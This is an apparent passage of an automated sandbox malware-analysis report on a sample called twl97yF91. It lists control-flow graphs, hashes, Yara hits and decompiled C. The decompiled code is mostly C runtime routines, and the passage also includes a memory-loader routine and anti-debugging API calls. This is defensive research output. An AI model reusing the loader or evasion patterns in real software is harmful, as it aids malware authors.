                                                                                                                                                                                                          control_flow_graph 152 2cb003c-2cb0047 153 2cb0049 152->153 154 2cb004c-2cb0263 call 2cb0a3f call 2cb0e0f call 2cb0d90 VirtualAlloc 152->154 153->154 169 2cb028b-2cb0292 154->169 170 2cb0265-2cb0289 call 2cb0a69 154->170 172 2cb02a1-2cb02b0 169->172 173 2cb02ce-2cb03c2 VirtualProtect call 2cb0cce call 2cb0ce7 170->173 172->173 174 2cb02b2-2cb02cc 172->174 181 2cb03d1-2cb03e0 173->181 174->172 182 2cb0439-2cb04b8 VirtualFree 181->182 183 2cb03e2-2cb0437 call 2cb0ce7 181->183 185 2cb04be-2cb04cd 182->185 186 2cb05f4-2cb05fe 182->186 183->181 190 2cb04d3-2cb04dd 185->190 187 2cb077f-2cb0789 186->187 188 2cb0604-2cb060d 186->188 193 2cb078b-2cb07a3 187->193 194 2cb07a6-2cb07b0 187->194 188->187 191 2cb0613-2cb0637 188->191 190->186 195 2cb04e3-2cb0505 LoadLibraryA 190->195 200 2cb063e-2cb0648 191->200 193->194 196 2cb086e-2cb08be LoadLibraryA 194->196 197 2cb07b6-2cb07cb 194->197 198 2cb0517-2cb0520 195->198 199 2cb0507-2cb0515 195->199 208 2cb08c7-2cb08f9 196->208 201 2cb07d2-2cb07d5 197->201 202 2cb0526-2cb0547 198->202 199->202 200->187 203 2cb064e-2cb065a 200->203 204 2cb07d7-2cb07e0 201->204 205 2cb0824-2cb0833 201->205 206 2cb054d-2cb0550 202->206 203->187 207 2cb0660-2cb066a 203->207 209 2cb07e2 204->209 210 2cb07e4-2cb0822 204->210 214 2cb0839-2cb083c 205->214 211 2cb05e0-2cb05ef 206->211 212 2cb0556-2cb056b 206->212 213 2cb067a-2cb0689 207->213 215 2cb08fb-2cb0901 208->215 216 2cb0902-2cb091d 208->216 209->205 210->201 211->190 217 2cb056f-2cb057a 212->217 218 2cb056d 212->218 219 2cb068f-2cb06b2 213->219 220 2cb0750-2cb077a 213->220 214->196 221 2cb083e-2cb0847 214->221 215->216 223 2cb059b-2cb05bb 217->223 224 2cb057c-2cb0599 217->224 218->211 225 2cb06ef-2cb06fc 219->225 226 2cb06b4-2cb06ed 219->226 220->200 227 2cb084b-2cb086c 221->227 228 2cb0849 221->228 
235 2cb05bd-2cb05db 223->235 224->235 229 2cb074b 225->229 230 2cb06fe-2cb0748 225->230 226->225 227->214 228->196 229->213 230->229 235->206
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02CB024D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                          • String ID: cess$kernel32.dll
                                                                                                                                                                                                          • API String ID: 4275171209-1230238691
                                                                                                                                                                                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                          • Instruction ID: cf7339fcc9830ce15fc99d41795d567bf203f76d7c6899e1791ff3b9f3428347
                                                                                                                                                                                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9527974A01229DFDB65CF68C984BADBBB1BF09304F1480D9E94DAB351DB30AA85DF14
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 236 4018f0-4018fa 237 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 236->237 238 4018fc-401900 236->238 241 401940-401949 GetLastError 237->241 242 401996-40199a 237->242 243 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 241->243 244 40198d-40198f 241->244 243->244 244->242 246 401991 call 401030 244->246 246->242
                                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                                          			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                                          				signed int _t12;
                                                                                                                                                                                                          				void* _t21;
                                                                                                                                                                                                          				int _t25;
                                                                                                                                                                                                          				void* _t30;
                                                                                                                                                                                                          				int _t32;
                                                                                                                                                                                                          				char* _t35;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t21 = __edx;
                                                                                                                                                                                                          				_t35 = _a4;
                                                                                                                                                                                                          				_t17 = __ecx;
                                                                                                                                                                                                          				if(_t35 != 0) {
                                                                                                                                                                                                          					_t25 = lstrlenA(_t35) + 1;
                                                                                                                                                                                                          					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
                                                                                                                                                                                                          					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
                                                                                                                                                                                                          					asm("sbb esi, esi");
                                                                                                                                                                                                          					_t30 =  ~_t12 + 1;
                                                                                                                                                                                                          					if(_t30 != 0) {
                                                                                                                                                                                                          						_t12 = GetLastError();
                                                                                                                                                                                                          						if(_t12 == 0x7a) {
                                                                                                                                                                                                          							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
                                                                                                                                                                                                          							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
                                                                                                                                                                                                          							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
                                                                                                                                                                                                          							asm("sbb esi, esi");
                                                                                                                                                                                                          							_t30 =  ~_t12 + 1;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if(_t30 != 0) {
                                                                                                                                                                                                          							_t12 = E00401030();
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					return _t12;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					 *__ecx = _t35;
                                                                                                                                                                                                          					return __eax;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}












                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401940
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3322701435-0
                                                                                                                                                                                                          • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                          • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 249 40af66-40af6e 250 40af7d-40af88 call 40b84d 249->250 253 40af70-40af7b call 40d2e3 250->253 254 40af8a-40af8b 250->254 253->250 257 40af8c-40af98 253->257 258 40afb3-40afca call 40af49 call 40cd39 257->258 259 40af9a-40afb2 call 40aefc call 40d2bd 257->259 259->258
                                                                                                                                                                                                          C-Code - Quality: 63%
                                                                                                                                                                                                          			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                          				signed int _v4;
                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                          				signed int _v40;
                                                                                                                                                                                                          				void* _t14;
                                                                                                                                                                                                          				signed int _t15;
                                                                                                                                                                                                          				intOrPtr* _t21;
                                                                                                                                                                                                          				signed int _t24;
                                                                                                                                                                                                          				void* _t28;
                                                                                                                                                                                                          				void* _t39;
                                                                                                                                                                                                          				void* _t40;
                                                                                                                                                                                                          				signed int _t42;
                                                                                                                                                                                                          				void* _t45;
                                                                                                                                                                                                          				void* _t47;
                                                                                                                                                                                                          				void* _t51;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t40 = __edi;
                                                                                                                                                                                                          				_t28 = __ebx;
                                                                                                                                                                                                          				_t45 = _t51;
                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                          					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
                                                                                                                                                                                                          					if(_t14 != 0) {
                                                                                                                                                                                                          						break;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t15 = E0040D2E3(_a4);
                                                                                                                                                                                                          					__eflags = _t15;
                                                                                                                                                                                                          					if(_t15 == 0) {
                                                                                                                                                                                                          						__eflags =  *0x423490 & 0x00000001;
                                                                                                                                                                                                          						if(( *0x423490 & 0x00000001) == 0) {
                                                                                                                                                                                                          							 *0x423490 =  *0x423490 | 0x00000001;
                                                                                                                                                                                                          							__eflags =  *0x423490;
                                                                                                                                                                                                          							E0040AEFC(0x423484);
                                                                                                                                                                                                          							E0040D2BD( *0x423490, 0x41a704);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						E0040AF49( &_v16, 0x423484);
                                                                                                                                                                                                          						E0040CD39( &_v16, 0x420fa4);
                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                          						_t47 = _t45;
                                                                                                                                                                                                          						_push(_t47);
                                                                                                                                                                                                          						_push(0xc);
                                                                                                                                                                                                          						_push(0x420ff8);
                                                                                                                                                                                                          						_t19 = E0040E1D8(_t28, _t40, 0x423484);
                                                                                                                                                                                                          						_t42 = _v4;
                                                                                                                                                                                                          						__eflags = _t42;
                                                                                                                                                                                                          						if(_t42 != 0) {
                                                                                                                                                                                                          							__eflags =  *0x4250b0 - 3;
                                                                                                                                                                                                          							if( *0x4250b0 != 3) {
                                                                                                                                                                                                          								_push(_t42);
                                                                                                                                                                                                          								goto L16;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								E0040D6E0(_t28, 4);
                                                                                                                                                                                                          								_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                          								_t24 = E0040D713(_t42);
                                                                                                                                                                                                          								_v40 = _t24;
                                                                                                                                                                                                          								__eflags = _t24;
                                                                                                                                                                                                          								if(_t24 != 0) {
                                                                                                                                                                                                          									_push(_t42);
                                                                                                                                                                                                          									_push(_t24);
                                                                                                                                                                                                          									E0040D743();
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_v16 = 0xfffffffe;
                                                                                                                                                                                                          								_t19 = E0040B70B();
                                                                                                                                                                                                          								__eflags = _v40;
                                                                                                                                                                                                          								if(_v40 == 0) {
                                                                                                                                                                                                          									_push(_v4);
                                                                                                                                                                                                          									L16:
                                                                                                                                                                                                          									__eflags = HeapFree( *0x4234b4, 0, ??);
                                                                                                                                                                                                          									if(__eflags == 0) {
                                                                                                                                                                                                          										_t21 = E0040BFC1(__eflags);
                                                                                                                                                                                                          										 *_t21 = E0040BF7F(GetLastError());
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						return E0040E21D(_t19);
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L19:
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t14;
                                                                                                                                                                                                          				goto L19;
                                                                                                                                                                                                          			}


















                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                                                                            • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                                                            • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                                                            • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                                                          • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                                                                                            • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1411284514-0
                                                                                                                                                                                                          • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                                                                                          • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.322608961.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_3050000_twl97yF91.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: {o^
                                                                                                                                                                                                          • API String ID: 0-4057684116
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 442 2cb0e0f-2cb0e24 SetErrorMode * 2 443 2cb0e2b-2cb0e2c 442->443 444 2cb0e26 442->444 444->443
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000400,?,?,02CB0223,?,?), ref: 02CB0E19
                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,?,02CB0223,?,?), ref: 02CB0E1E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 445 40e7ee-40e7f6 call 40e7c3 447 40e7fb-40e7ff ExitProcess 445->447
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E0040E7EE(int _a4) {
                                                                                                                                                                                                          
                                                                                                                                                                                                          				E0040E7C3(_a4); // executed
                                                                                                                                                                                                          				ExitProcess(_a4);
                                                                                                                                                                                                          			}




                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ___crtCorExitProcess.LIBCMT ref: 0040E7F6
                                                                                                                                                                                                            • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                                                                                                                                                                                            • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                                                                                                                                                                                            • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0040E7FF
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2427264223-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 448 40d534-40d556 HeapCreate 449 40d558-40d559 448->449 450 40d55a-40d563 448->450
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E0040D534(intOrPtr _a4) {
                                                                                                                                                                                                          				void* _t6;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                                                                                                                          				 *0x4234b4 = _t6;
                                                                                                                                                                                                          				if(_t6 != 0) {
                                                                                                                                                                                                          					 *0x4250b0 = 1;
                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					return _t6;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}





                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateHeap
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 10892065-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 451 40ea0a-40ea16 call 40e8de 453 40ea1b-40ea1f 451->453
                                                                                                                                                                                                          C-Code - Quality: 25%
                                                                                                                                                                                                          			E0040EA0A(intOrPtr _a4) {
                                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                                          				void* _t2;
                                                                                                                                                                                                          				void* _t3;
                                                                                                                                                                                                          				void* _t4;
                                                                                                                                                                                                          				void* _t5;
                                                                                                                                                                                                          				void* _t8;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                          				_push(_a4);
                                                                                                                                                                                                          				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
                                                                                                                                                                                                          				return _t2;
                                                                                                                                                                                                          			}










                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _doexit.LIBCMT ref: 0040EA16
                                                                                                                                                                                                            • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
                                                                                                                                                                                                            • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
                                                                                                                                                                                                            • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
                                                                                                                                                                                                            • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
                                                                                                                                                                                                            • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
                                                                                                                                                                                                            • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
                                                                                                                                                                                                            • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
                                                                                                                                                                                                            • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1597249276-0
                                                                                                                                                                                                          • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                                                          • Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 454 2cb0920-2cb0929 TerminateProcess
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 02CB0929
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ProcessTerminate
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 560597551-0
                                                                                                                                                                                                          • Opcode ID: a81f69529bcf2872433a6626b6dddab0307a3207cad9c1e7665d850a07e5ea8b
                                                                                                                                                                                                          • Instruction ID: f1a77b98683cafb1fb7459b4dcf7902f75ab8b99c0f73db378513641b05b932d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a81f69529bcf2872433a6626b6dddab0307a3207cad9c1e7665d850a07e5ea8b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1190026038415011D820259C4C02B0510021751634F3047107170B91D4D84496144126
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 02CC395B
                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02CC3970
                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 02CC397B
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 02CC3997
                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 02CC399E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2579439406-0
                                                                                                                                                                                                          • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                          • Instruction ID: 5b454e1f44dfc620a4a1794eb5f9110e0bf088dfb5e59747b9a67da5b99b9090
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD21C3B4A01204EFD720DF65F9496457FB0FB08356F904079E50D87662E7B86682CF4D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                                          			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                                                                                          				intOrPtr _v0;
                                                                                                                                                                                                          				void* _v804;
                                                                                                                                                                                                          				intOrPtr _v808;
                                                                                                                                                                                                          				intOrPtr _v812;
                                                                                                                                                                                                          				intOrPtr _t6;
                                                                                                                                                                                                          				intOrPtr _t11;
                                                                                                                                                                                                          				intOrPtr _t12;
                                                                                                                                                                                                          				intOrPtr _t13;
                                                                                                                                                                                                          				long _t17;
                                                                                                                                                                                                          				intOrPtr _t21;
                                                                                                                                                                                                          				intOrPtr _t22;
                                                                                                                                                                                                          				intOrPtr _t25;
                                                                                                                                                                                                          				intOrPtr _t26;
                                                                                                                                                                                                          				intOrPtr _t27;
                                                                                                                                                                                                          				intOrPtr* _t31;
                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t27 = __esi;
                                                                                                                                                                                                          				_t26 = __edi;
                                                                                                                                                                                                          				_t25 = __edx;
                                                                                                                                                                                                          				_t22 = __ecx;
                                                                                                                                                                                                          				_t21 = __ebx;
                                                                                                                                                                                                          				_t6 = __eax;
                                                                                                                                                                                                          				_t34 = _t22 -  *0x422234; // 0xa61828c8
                                                                                                                                                                                                          				if(_t34 == 0) {
                                                                                                                                                                                                          					asm("repe ret");
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				 *0x423b98 = _t6;
